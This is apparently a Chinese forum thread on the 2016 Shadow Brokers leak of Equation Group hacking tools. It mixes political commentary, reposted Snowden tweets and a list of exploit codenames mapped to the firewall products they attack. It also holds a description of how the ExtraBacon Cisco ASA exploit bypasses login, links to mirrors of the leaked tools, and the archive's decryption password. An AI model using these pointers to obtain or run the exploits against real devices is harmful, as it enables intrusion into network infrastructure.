
===================Updated 8.20===========================

shotgun從攻擊範圍、時間線為縱軸來看全局發展。

我想談論下政治上的影響。美國NSA現在應該挺被動的。要知道方程式之前入侵竊取可不僅僅是針對中國、俄羅斯。包括歐洲，包括英國，包括很多美國的盟友！這件事被坐實，美國怎麼向自己的盟友解釋？

"其實我們也是一不小心黑進去的，隨便拿了點東西，賊不走空嘛"。這麼說顯然沒人信啊！！

另一方面，與上次hackingteam比，這次泄露的重量絕對有過之而無不及。對各個國家網路軍火的差異性會有所減少。

對普通安全愛好者來說，是饕餮大餐，看看人家的文檔，想想人家為什麼這麼做。為什麼要去搞防火牆。為什麼要去搞運營商。都是別人攻擊思路的展現。都是成長。

題外話

中國在去年9月25日，習馬會，雙方鄭重承諾不會開展對對方知識產權和商業黑客行為。注意哦，這裡說的可是"針對知識產權和商業黑客行為"。國家間的鬥爭從不停止。也沒法簽訂協議，簽了說實話也沒人信。這種事情，就是看誰水平好, 「文明的戰場」。

結果習總剛回國，美國就報了中國對五家美國公司和一家美國工會進行攻擊，並竊取了相關資料給了中鋁、寶鋼和核電技術公司。當然美國那邊也沒閑著，也猛搞中國。

文明5遊戲裡面，各個國家可以偷竊別人的技術。這樣才能讓整個世界快速進步嘛。我是舉雙手贊成的。

==========================================================

抱歉沒時間回復。現在有時間都在看這個。要看要讀要測試。

總體感覺很牛逼。團隊力量很強大。

測試了兩個漏洞，已經成功，還有大把工具。

這可比hacking team的東西刺激多了。

樓上有人說談妥了，不公開後面的文件了。

不可能。如果這是俄羅斯乾的，就不可能不公開。或早或晚。

這讓我們想到什麼呢，攻擊別人的時候想想有沒有防禦住別人攻擊的能力。沒有就別亂動手。

回頭再回來寫，先干正事去了。

看完永恆之藍病毒的新聞，回來考古

https://medium.com/@msuiche/shadow-brokers-nsa-exploits-of-the-week-3f7e17bdc216#.cr5st27gs

EGBL = EGREGIOUS BLUNDER (Fortigate Firewall + HTTPD exploit (apparently 2006 CVE )
ELBA = ELIGIBLE BACHELOR
ELBO = ELIGIBLE BOMBSHELL (Chinese TOPSEC firewall versions 3.3.005.057.1 to 3.3.010.024.1)
ELCA = ELIGIBLE CANDIDATE
ELCO = ELIGIBLE CONTESTANT
EPBA = EPIC BANANA
ESPL = ESCALATE PLOWMAN
EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)
BANANAGLEE = Juniper Netscreen Devices
BARGLEE
BLATSTING
BUZZDIRECTION
SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)
BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)

EquationGroup Tool Leak

The requirements for the ExtraBacon exploit are that you have SNMP read access to the firewall, as well as access to either telnet or SSH. The ASA must be running 8.x, up to 8.4(4), and is said to have the possibility to crash the firewall if something goes wrong.
Once the exploit is successful, the attacker will be able to SSH to or telnet to (depending on what protocol is setup on the FW) without needing to enter credentials. If an enable password is set, this will still need to be a barrier for managing the firewall, as the exploit does not appear to disable it.

密碼忘了可以自己改。

防火牆密碼恢復手記

下載文件後一臉懵逼的可以看看這個 https://consen.github.io/2016/08/18/GnuPG-practice/

今天最強爆料，某黑客組織跟蹤了方程式組織（就是創造了stuxnet, duqu, flame等專供國家APT組織程序的）的流量，並且黑進來了方程式網路，獲取的大量方程式組織的程序。黑客放出了部分方程式的程序（主要是防火牆部分，目測包括juniper、cisco、某H，某T的植入程序和後門），黑客同時搞了個拍賣，誰給的比特幣多就把另一個有更高價值的壓縮包密碼告訴他（猜測應是對操作系統之類的後門）。

鏈接：GitHub - theshadowbrokers/EQGRP-AUCTION

我只是大自然的搬運工：Snowden explains the Shadow Brokers/Equation Group/NSA hack / Boing Boing

Edward Snowden 發了一系列的推來給小白們做科普解釋這件事，有媒體把這些推合併在一起了。我覺得寫的還是很明白的。

下劃線部分是搬運工同學畫出來的重點，原文並無下劃線。

Techdirt has assembled Snowden"s tweets in handy form:

The hack of an NSA malware staging server is not unprecedented, but the publication of the take is. Here"s what you need to know:
NSA traces and targets malware C2 servers in a practice called Counter Computer Network Exploitation, or CCNE. So do our rivals. NSA is often lurking undetected for years on the C2 and ORBs (proxy hops) of state hackers. This is how we follow their operations. This is how we steal their rivals" hacking tools and reverse-engineer them to create "fingerprints" to help us detect them in the future.
Here"s where it gets interesting: the NSA is not made of magic. Our rivals do the same thing to us -- and occasionally succeed. Knowing this, NSA"s hackers (TAO) are told not to leave their hack tools ("binaries") on the server after an op. But people get lazy.
What"s new? NSA malware staging servers getting hacked by a rival is not new. A rival publicly demonstrating they have done so is.
Why did they do it? No one knows, but I suspect this is more diplomacy than intelligence, related to the escalation around the DNC hack. Circumstantial evidence and conventional wisdom indicates Russian responsibility. Here"s why that is significant: This leak is likely a warning that someone can prove US responsibility for any attacks that originated from this malware server. That could have significant foreign policy consequences. Particularly if any of those operations targeted US allies. Particularly if any of those operations targeted elections. Accordingly, this may be an effort to influence the calculus of decision-makers wondering how sharply to respond to the DNC hacks.
TL;DR: This leak looks like a somebody sending a message that an escalation in the attribution game could get messy fast.
Bonus: When I came forward, NSA would have migrated offensive operations to new servers as a precaution - it"s cheap and easy. So? So... The undetected hacker squatting on this NSA server lost access in June 2013. Rare public data point on the positive results of the leak.
You"re welcome, @NSAGov. Lots of love.

另一個文件的密碼一個月前放出來了。。。

CrDj"(;Va.*NdlnzB9M?@K2)#&>deB7mN

https://github.com/x0rz/EQGRP

學習是沒有盡頭的，好玩就是最好玩的事情。

又整大事了

情報機構上下整頓

全球網路攻防能力再上台階，進一步縮小差距

會不會在三五年內出更大的事？但願大家平安

其實,滲透有必要攻擊防火牆嗎?多此一舉呀,而且最重要的是需要SNMP讀許可權,telnet或SSH登陸,這3點對公網開放的少之又少,果然公開免費的實際運用性不強,求拍賣那個包的解壓方式！

只能拿運營商的ASA實驗,弄癱了,自己都上不了網了...(T_T)

另外華為那個泄露是VRP3.3,這尼瑪怕是10年前的版本了,沒有VRP5以上的泄露有毛用....

國家應該出台政策，強行要求教育事業使用Linux系統，就是因為這些學校TMD都使用Windows，搞得現在的學生都使用Windows，搞得一代又一代人去搞Windows。